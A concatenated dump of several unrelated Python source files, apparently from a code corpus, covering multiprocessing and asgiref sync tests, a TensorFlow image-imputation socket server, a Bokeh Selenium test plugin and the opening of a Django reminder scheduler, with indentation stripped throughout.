multiprocessing.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
"""
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
#
#
#
try:
    from ctypes import Structure, c_int, c_double
    # Value, Array and copy come from multiprocessing.sharedctypes, not ctypes
    from multiprocessing.sharedctypes import Value, Array, copy
except ImportError:
    Structure = object
    c_int = c_double = None
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _double(self, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
if c_int is None:
return
x = Value('i', 7, lock=lock)
y = Value(ctypes.c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = Array('d', range(10), lock=lock)
string = Array('c', 20, lock=lock)
string.value = 'hello'
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
if c_int is None:
return
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _test_finalize(self, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
        # call multiprocessing's cleanup function then exit process without
        # garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = (
'multiprocessing', 'multiprocessing.connection',
'multiprocessing.heap', 'multiprocessing.managers',
'multiprocessing.pool', 'multiprocessing.process',
'multiprocessing.reduction', 'multiprocessing.sharedctypes',
'multiprocessing.synchronize', 'multiprocessing.util'
)
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
def _test_level(self, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type[0].upper() + type[1:]
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
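# For illustration only (not part of the original suite): with type='processes',
# create_test_cases() turns a base class such as _TestConnection into a new
# unittest case named 'WithProcessesTestConnection' that inherits from the base
# class, unittest.TestCase and ProcessesMixin:
#
#     cases = create_test_cases(ProcessesMixin, type='processes')
#     # cases['WithProcessesTestConnection'] is a runnable TestCase subclass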
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
locals().update(get_attributes(multiprocessing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
manager = object.__new__(multiprocessing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
locals().update(get_attributes(multiprocessing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
testcases_other = [OtherTest]
#
#
#
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
from test.test_support import TestSkipped
raise TestSkipped("OSError raises on RLock creation, see issue 3111!")
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
multiprocessing.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = multiprocessing.Pool(4)
ThreadsMixin.pool = multiprocessing.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
test_sync.py
|
import asyncio
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from functools import wraps
from unittest import TestCase
import pytest
from asgiref.sync import async_to_sync, sync_to_async
@pytest.mark.asyncio
async def test_sync_to_async():
"""
Tests we can call sync functions from an async thread
(even if the number of thread workers is less than the number of calls)
"""
# Define sync function
def sync_function():
time.sleep(1)
return 42
# Ensure outermost detection works
# Wrap it
async_function = sync_to_async(sync_function)
# Check it works right
start = time.monotonic()
result = await async_function()
end = time.monotonic()
assert result == 42
assert end - start >= 1
# Set workers to 1, call it twice and make sure that works right
loop = asyncio.get_event_loop()
old_executor = loop._default_executor
loop.set_default_executor(ThreadPoolExecutor(max_workers=1))
try:
start = time.monotonic()
await asyncio.wait([async_function(), async_function()])
end = time.monotonic()
# It should take at least 2 seconds as there's only one worker.
assert end - start >= 2
finally:
loop.set_default_executor(old_executor)
@pytest.mark.asyncio
async def test_sync_to_async_decorator():
"""
Tests sync_to_async as a decorator
"""
# Define sync function
@sync_to_async
def test_function():
time.sleep(1)
return 43
# Check it works right
result = await test_function()
assert result == 43
@pytest.mark.asyncio
async def test_nested_sync_to_async_retains_wrapped_function_attributes():
"""
Tests that attributes of functions wrapped by sync_to_async are retained
"""
def enclosing_decorator(attr_value):
@wraps(attr_value)
def wrapper(f):
f.attr_name = attr_value
return f
return wrapper
@enclosing_decorator("test_name_attribute")
@sync_to_async
def test_function():
pass
assert test_function.attr_name == "test_name_attribute"
assert test_function.__name__ == "test_function"
@pytest.mark.asyncio
async def test_sync_to_async_method_decorator():
"""
Tests sync_to_async as a method decorator
"""
# Define sync function
class TestClass:
@sync_to_async
def test_method(self):
time.sleep(1)
return 44
# Check it works right
instance = TestClass()
result = await instance.test_method()
assert result == 44
@pytest.mark.asyncio
async def test_sync_to_async_method_self_attribute():
"""
Tests sync_to_async on a method copies __self__
"""
# Define sync function
class TestClass:
def test_method(self):
time.sleep(0.1)
return 45
# Check it works right
instance = TestClass()
method = sync_to_async(instance.test_method)
result = await method()
assert result == 45
# Check __self__ has been copied
assert method.__self__ == instance
@pytest.mark.asyncio
async def test_async_to_sync_to_async():
"""
Tests we can call async functions from a sync thread created by async_to_sync
(even if the number of thread workers is less than the number of calls)
"""
result = {}
# Define async function
async def inner_async_function():
result["worked"] = True
result["thread"] = threading.current_thread()
return 65
# Define sync function
def sync_function():
return async_to_sync(inner_async_function)()
# Wrap it
async_function = sync_to_async(sync_function)
# Check it works right
number = await async_function()
assert number == 65
assert result["worked"]
# Make sure that it didn't needlessly make a new async loop
assert result["thread"] == threading.current_thread()
def test_async_to_sync():
"""
Tests we can call async_to_sync outside of an outer event loop.
"""
result = {}
# Define async function
async def inner_async_function():
await asyncio.sleep(0)
result["worked"] = True
return 84
# Run it
sync_function = async_to_sync(inner_async_function)
number = sync_function()
assert number == 84
assert result["worked"]
def test_async_to_sync_decorator():
"""
Tests we can call async_to_sync as a function decorator
"""
result = {}
# Define async function
@async_to_sync
async def test_function():
await asyncio.sleep(0)
result["worked"] = True
return 85
# Run it
number = test_function()
assert number == 85
assert result["worked"]
def test_async_to_sync_method_decorator():
"""
Tests we can call async_to_sync as a function decorator
"""
result = {}
# Define async function
class TestClass:
@async_to_sync
async def test_function(self):
await asyncio.sleep(0)
result["worked"] = True
return 86
# Run it
instance = TestClass()
number = instance.test_function()
assert number == 86
assert result["worked"]
@pytest.mark.asyncio
async def test_async_to_sync_in_async():
"""
Makes sure async_to_sync bails if you try to call it from an async loop
"""
# Define async function
async def inner_async_function():
return 84
# Run it
sync_function = async_to_sync(inner_async_function)
with pytest.raises(RuntimeError):
sync_function()
def test_async_to_sync_in_thread():
"""
Tests we can call async_to_sync inside a thread
"""
result = {}
# Define async function
@async_to_sync
async def test_function():
await asyncio.sleep(0)
result["worked"] = True
# Make a thread and run it
thread = threading.Thread(target=test_function)
thread.start()
thread.join()
assert result["worked"]
def test_async_to_async_method_self_attribute():
"""
Tests async_to_async on a method copies __self__.
"""
# Define async function.
class TestClass:
async def test_function(self):
await asyncio.sleep(0)
return 45
# Check it works right.
instance = TestClass()
sync_function = async_to_sync(instance.test_function)
number = sync_function()
assert number == 45
# Check __self__ has been copied.
assert sync_function.__self__ is instance
def test_thread_sensitive_outside_sync():
"""
Tests that thread_sensitive SyncToAsync where the outside is sync code runs
in the main thread.
"""
result = {}
# Middle async function
@async_to_sync
async def middle():
await inner()
# Inner sync function
def inner():
result["thread"] = threading.current_thread()
inner = sync_to_async(inner, thread_sensitive=True)
# Run it
middle()
assert result["thread"] == threading.current_thread()
@pytest.mark.asyncio
async def test_thread_sensitive_outside_async():
"""
Tests that thread_sensitive SyncToAsync where the outside is async code runs
in a single, separate thread.
"""
result_1 = {}
result_2 = {}
# Outer sync function
def outer(result):
middle(result)
outer = sync_to_async(outer, thread_sensitive=True)
# Middle async function
@async_to_sync
async def middle(result):
await inner(result)
# Inner sync function
def inner(result):
result["thread"] = threading.current_thread()
inner = sync_to_async(inner, thread_sensitive=True)
# Run it (in supposed parallel!)
await asyncio.wait([outer(result_1), inner(result_2)])
# They should not have run in the main thread, but in the same thread
assert result_1["thread"] != threading.current_thread()
assert result_1["thread"] == result_2["thread"]
def test_thread_sensitive_double_nested_sync():
"""
Tests that thread_sensitive SyncToAsync nests inside itself where the
outside is sync.
"""
result = {}
# Async level 1
@async_to_sync
async def level1():
await level2()
# Sync level 2
def level2():
level3()
level2 = sync_to_async(level2, thread_sensitive=True)
# Async level 3
@async_to_sync
async def level3():
await level4()
# Sync level 2
def level4():
result["thread"] = threading.current_thread()
level4 = sync_to_async(level4, thread_sensitive=True)
# Run it
level1()
assert result["thread"] == threading.current_thread()
@pytest.mark.asyncio
async def test_thread_sensitive_double_nested_async():
"""
Tests that thread_sensitive SyncToAsync nests inside itself where the
outside is async.
"""
result = {}
# Sync level 1
def level1():
level2()
level1 = sync_to_async(level1, thread_sensitive=True)
# Async level 2
@async_to_sync
async def level2():
await level3()
# Sync level 3
def level3():
level4()
level3 = sync_to_async(level3, thread_sensitive=True)
# Async level 4
@async_to_sync
async def level4():
result["thread"] = threading.current_thread()
# Run it
await level1()
assert result["thread"] == threading.current_thread()
class ASGITest(TestCase):
"""
Tests collection of async cases inside classes
"""
@async_to_sync
async def test_wrapped_case_is_collected(self):
self.assertTrue(True)
def test_sync_to_async_detected_as_coroutinefunction():
"""
Tests that SyncToAsync functions are detected as coroutines.
"""
def sync_func():
return
assert not asyncio.iscoroutinefunction(sync_to_async)
assert asyncio.iscoroutinefunction(sync_to_async(sync_func))
|
multi-threaded.py
|
#!/usr/bin/env python3
import argparse
import multiprocessing as mp
import numpy as np
from sklearn.preprocessing import LabelEncoder
import socket
import sys
import time
import tensorflow as tf
import traceback
import impute
import serialize
# disable eager mode -> run in graph mode
tf.compat.v1.disable_eager_execution()
def worker(geohashes, model_path, server_sock, weight_path):
    # initialize encoder from the geohashes passed to this worker
    le = LabelEncoder()
    encoder = le.fit(geohashes)
    # open the model structure from the given path
    tf.keras.backend.clear_session()
    with open(model_path, 'r') as layers:
        model_structure = layers.read()
    model = tf.keras.models.model_from_json(model_structure)
    model.load_weights(weight_path)
# first prediction is time consuming, building the GPU function
model.predict((np.zeros((1, 3, 256, 256, 3)),
np.zeros((1, 1)),
np.zeros((1, 1)),
np.zeros((1, 1)),
np.zeros((1, 16, 16, 3))))
# make model read only, thread safe
session = tf.compat.v1.keras.backend.get_session()
    tf.compat.v1.keras.backend.set_session(session)
session.graph.finalize()
while 1:
try:
# accept connection
sock, address = server_sock.accept()
# read batch metadata
sentinel2_batch, modis_batch, geohash_batch, \
timestamp_batch = serialize.read_batch(sock)
# compute input tensor
tensor = impute.compile_tensor(sentinel2_batch,
modis_batch, encoder, geohash_batch, timestamp_batch)
# impute images
imputed_images = impute.impute_batch(model, tensor)
# write imputed images
serialize.write_images(imputed_images,
sentinel2_batch[0][0], sock)
# close client connection
sock.close()
except:
traceback.print_exc()
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(description='impute stip images')
parser.add_argument('-i', '--ip-address', type=str,
help='server ip address', default='0.0.0.0')
parser.add_argument('-g', '--geohash', action='append',
help='geohashes handled by this node', required=True)
parser.add_argument('-m', '--model',
help='model location', required=True)
parser.add_argument('-p', '--port', type=int,
help='server port', default='12289')
parser.add_argument('-t', '--thread-count', type=int,
help='number of worker threads', default=33)
parser.add_argument('-w', '--weights',
help='model weights location', required=True)
args = parser.parse_args()
# open server socket
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server_sock.bind((args.ip_address, args.port))
server_sock.listen(8)
except socket.error as msg:
        print('failed to bind socket: {}'.format(msg))
sys.exit()
# initialize workers
workers = [mp.Process(target=worker, args=(args.geohash, args.model, server_sock, args.weights, )) for i in range(args.thread_count)]
# start workers
for p in workers:
p.daemon = True
p.start()
while True:
try:
time.sleep(10)
except KeyboardInterrupt:
if server_sock:
server_sock.close()
break
except:
traceback.print_exc()
break
if server_sock:
server_sock.close()
|
project.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Define a Pytest plugin for Bokeh-specific testing tools
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import socket
import time
from contextlib import closing
from threading import Thread
# External imports
import pytest
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler
# Bokeh imports
import bokeh.server.views.ws as ws
from bokeh._testing.util.selenium import INIT, RESULTS, wait_for_canvas_resize
from bokeh.io import save
from bokeh.server.server import Server
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
pytest_plugins = (
"bokeh._testing.plugins.project",
"bokeh._testing.plugins.file_server",
"bokeh._testing.plugins.selenium",
)
__all__ = (
'bokeh_app_info',
'bokeh_model_page',
'bokeh_server_page',
'find_free_port',
'output_file_url',
'single_plot_page',
'test_file_path_and_url',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
@pytest.fixture
def output_file_url(request, file_server):
from bokeh.io import output_file
filename = request.function.__name__ + '.html'
file_obj = request.fspath.dirpath().join(filename)
file_path = file_obj.strpath
url = file_path.replace('\\', '/') # Windows-proof
output_file(file_path, mode='inline')
def tear_down():
if file_obj.isfile():
file_obj.remove()
request.addfinalizer(tear_down)
return file_server.where_is(url)
@pytest.fixture
def test_file_path_and_url(request, file_server):
filename = request.function.__name__ + '.html'
file_obj = request.fspath.dirpath().join(filename)
file_path = file_obj.strpath
url = file_path.replace('\\', '/') # Windows-proof
def tear_down():
if file_obj.isfile():
file_obj.remove()
request.addfinalizer(tear_down)
return file_path, file_server.where_is(url)
class _ExitHandler(RequestHandler):
def initialize(self, io_loop):
self.io_loop = io_loop
async def get(self, *args, **kwargs):
self.io_loop.stop()
def find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
return s.getsockname()[1]
@pytest.fixture
def bokeh_app_info(request, driver):
''' Start a Bokeh server app and return information needed to test it.
Returns a tuple (url, message_test_port), where the latter is defined as
namedtuple('MessageTestPort', ['sent', 'received'])
and will contain all messages that the Bokeh Server sends/receives while
running during the test.
'''
def func(modify_doc):
from collections import namedtuple
MessageTestPort = namedtuple('MessageTestPort', ['sent', 'received'])
ws._message_test_port = MessageTestPort([], [])
port = find_free_port()
def worker():
io_loop = IOLoop()
server = Server({'/': modify_doc},
port=port,
io_loop=io_loop,
extra_patterns=[('/exit', _ExitHandler, dict(io_loop=io_loop))])
server.start()
server.io_loop.start()
t = Thread(target=worker)
t.start()
def cleanup():
driver.get("http://localhost:%d/exit" % port)
# XXX (bev) this line is a workaround for https://github.com/bokeh/bokeh/issues/7970
# and should be removed when that issue is resolved
driver.get_log('browser')
ws._message_test_port = None
t.join()
request.addfinalizer(cleanup)
return "http://localhost:%d/" % port, ws._message_test_port
return func
class _BokehPageMixin:
@property
def results(self):
WebDriverWait(self._driver, 10).until(EC.staleness_of(self.test_div))
self.test_div = self._driver.find_element_by_class_name("bokeh-test-div")
return self._driver.execute_script(RESULTS)
@property
def driver(self):
return self._driver
def init_results(self):
self._driver.execute_script(INIT)
self.test_div = self._driver.find_element_by_class_name("bokeh-test-div")
def click_element_at_position(self, element, x, y):
actions = ActionChains(self._driver)
actions.move_to_element_with_offset(element, x, y)
actions.click()
actions.perform()
def double_click_element_at_position(self, element, x, y):
actions = ActionChains(self._driver)
actions.move_to_element_with_offset(element, x, y)
actions.click()
actions.click()
actions.perform()
def drag_element_at_position(self, element, x, y, dx, dy, mod=None):
actions = ActionChains(self._driver)
if mod:
actions.key_down(mod)
actions.move_to_element_with_offset(element, x, y)
actions.click_and_hold()
actions.move_by_offset(dx, dy)
actions.release()
if mod:
actions.key_up(mod)
actions.perform()
def send_keys(self, *keys):
actions = ActionChains(self._driver)
actions.send_keys(*keys)
actions.perform()
def has_no_console_errors(self):
return self._has_no_console_errors(self._driver)
class _BokehModelPage(_BokehPageMixin):
def __init__(self, model, driver, output_file_url, has_no_console_errors):
self._driver = driver
self._model = model
self._has_no_console_errors = has_no_console_errors
save(self._model)
self._driver.get(output_file_url)
self.init_results()
class _CanvasMixin:
def click_canvas_at_position(self, x, y):
self.click_element_at_position(self.canvas, x, y)
def double_click_canvas_at_position(self, x, y):
self.double_click_element_at_position(self.canvas, x, y)
def click_custom_action(self):
button = self._driver.find_element_by_class_name("bk-toolbar-button-custom-action")
button.click()
def drag_canvas_at_position(self, x, y, dx, dy, mod=None):
self.drag_element_at_position(self.canvas, x, y, dx, dy, mod)
def get_toolbar_button(self, name):
return self.driver.find_element_by_class_name('bk-tool-icon-' + name)
@pytest.fixture()
def bokeh_model_page(driver, output_file_url, has_no_console_errors):
def func(model):
return _BokehModelPage(model, driver, output_file_url, has_no_console_errors)
return func
class _SinglePlotPage(_BokehModelPage, _CanvasMixin):
# model may be a layout, but should only contain a single plot
def __init__(self, model, driver, output_file_url, has_no_console_errors):
super().__init__(model, driver, output_file_url, has_no_console_errors)
self.canvas = self._driver.find_element_by_tag_name('canvas')
wait_for_canvas_resize(self.canvas, self._driver)
@pytest.fixture()
def single_plot_page(driver, output_file_url, has_no_console_errors):
def func(model):
return _SinglePlotPage(model, driver, output_file_url, has_no_console_errors)
return func
class _BokehServerPage(_BokehPageMixin, _CanvasMixin):
def __init__(self, modify_doc, driver, bokeh_app_info, has_no_console_errors):
self._driver = driver
self._has_no_console_errors = has_no_console_errors
self._app_url, self.message_test_port = bokeh_app_info(modify_doc)
time.sleep(0.1)
self._driver.get(self._app_url)
self.init_results()
self.canvas = self._driver.find_element_by_tag_name('canvas')
wait_for_canvas_resize(self.canvas, self._driver)
@pytest.fixture()
def bokeh_server_page(driver, bokeh_app_info, has_no_console_errors):
def func(modify_doc):
return _BokehServerPage(modify_doc, driver, bokeh_app_info, has_no_console_errors)
return func
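# A rough usage sketch (illustrative only; the figure/glyph calls below are
# assumptions, not part of this plugin):
#
#     def test_example(bokeh_server_page):
#         def modify_doc(doc):
#             from bokeh.plotting import figure
#             p = figure()
#             p.circle([1, 2, 3], [1, 2, 3])
#             doc.add_root(p)
#         page = bokeh_server_page(modify_doc)
#         assert page.has_no_console_errors()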
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
scheduler.py
|
import logging
from sys import stdout
from datetime import datetime
from threading import Timer, Thread
from django.dispatch import receiver
from reminders.models import Reminder, ReminderType
from main.utilities import send_reminder_email, create_notification
from django.db.models.signals import post_save, pre_delete, post_delete
class UserAlertScheduler():
"""
    UserAlertScheduler is our implementation of a reminder scheduler for when the user wants to be
    notified at a specific time.
    The User Alert Scheduler depends on the DB and is registered to its save and delete events:
    - When the user adds a new reminder, the scheduler adopts the new reminder if its time is earlier
    than the time of the current reminder.
    - When the user deletes a reminder, the scheduler replaces its current reminder if it was
    the same reminder and schedules the next reminder in line.
    ** Because the scheduler is only relevant when there is an action in the DB and is not called
    from outside of the class, every method defined here is private and static.
    In addition, this is a Singleton object created once at the start of the reminder app.
    The methods the scheduler currently supports are send_reminder_email and create_notification.
    Other functions can be added through the _get_function method, which takes a ReminderType enum
    as defined in the Reminder model.
    Each function needs to have the signature function_name(message, <user>),
    where <user> is an instance of the user model defined in our User model.
    This scheduler also has a logger object; because it is a complicated implementation there can be a lot
    of errors and missed calls, so a logger has been placed with info and debug calls.
"""
__logger = None # the logger object of the class
__instance = None # the instance of the class
__current_timer = None # the current reminder timer the scheduler is running
__current_reminder = None # the current reminder the scheduler is working on
def __new__(self):
"""
        __new__ is used because we want to make the scheduler a singleton:
        the __instance attribute is checked every time to see whether it has been initialized;
        if so, __instance is returned, otherwise this is the first call and it is initialized
"""
if not UserAlertScheduler.__instance:
UserAlertScheduler.__logger = self.define_logger()
UserAlertScheduler.__logger.debug("creating a new instance of UserAlertScheduler")
UserAlertScheduler.__instance = super(UserAlertScheduler, self).__new__(self)
return UserAlertScheduler.__instance
@staticmethod
def define_logger(file=stdout, log_level=logging.WARNING):
""" define the __logger object.
file: where the logger will log all his message. default is stdout
logger level: define which types of logger message will show up. default Warning """
log_format = "%(levelname)s %(asctime)s - %(message)s"
logging.basicConfig(filemode=file, level=log_level, format=log_format)
return logging.getLogger(__name__)
@staticmethod
    def __clean_up():
        """ remove late reminders.
        Each reminder that has been scheduled is deleted at the end of its action.
        Reminders that the scheduler did not schedule before its initialization
        and whose time has already passed are late reminders, reminders that should
        have been handled but never were; in this case the scheduler deletes them all """
UserAlertScheduler.__logger.info("in clean up")
for reminder in Reminder.objects.order_by('date_time'):
# check each reminder time against the current time
if UserAlertScheduler.__get_time_difference(reminder.date_time) < 0:
Reminder.objects.get(id=reminder.id).delete()
@staticmethod
def __get_time_difference(date_time):
""" return the time difference between the given date_time to our current time """
return date_time.timestamp() - datetime.now().timestamp()
@staticmethod
def _get_args(reminder):
""" get the date time, message, method type and user id from the reminder object """
message = reminder.messages
method_type = reminder.method
date_time = reminder.date_time
user_id = reminder.participant_id.user_id
return date_time, message, method_type, user_id
@staticmethod
def _get_function(method_type):
""" get the functions to invoke using the method type given """
function_to_invoke = list()
if method_type in (ReminderType.EMAIL, ReminderType.WEBSITE_EMAIL):
function_to_invoke.append(send_reminder_email)
if method_type in (ReminderType.WEBSITE, ReminderType.WEBSITE_EMAIL):
function_to_invoke.append(create_notification)
return function_to_invoke
@staticmethod
def __add_alert(reminder=None):
""" add a new alert.
the schedule will check against his current reminder if the reminder
given has a better time then his own, if so the scheduler will stop
the timer and replace the current reminder with the newly given reminder.
reminder: a reminder object as defined in the Reminder model,
if nothing is given as the reminder object then
the reminder will be selected as the minimum date_time of all reminders """
UserAlertScheduler.__logger.info("in add alert.")
UserAlertScheduler.__logger.debug(f"reminder value in: {reminder}")
# the reminder given is None, get the next reminder from the DB using the date_time field
if not reminder:
reminder = Reminder.objects.get_next_reminder()
UserAlertScheduler.__logger.debug(f"reminder value after if: {reminder}")
if not reminder: # the DB is empty, end the function
UserAlertScheduler.__logger.debug("The DB is empty, there isn't a task waiting.")
return None
# get all the arguments from the reminder object
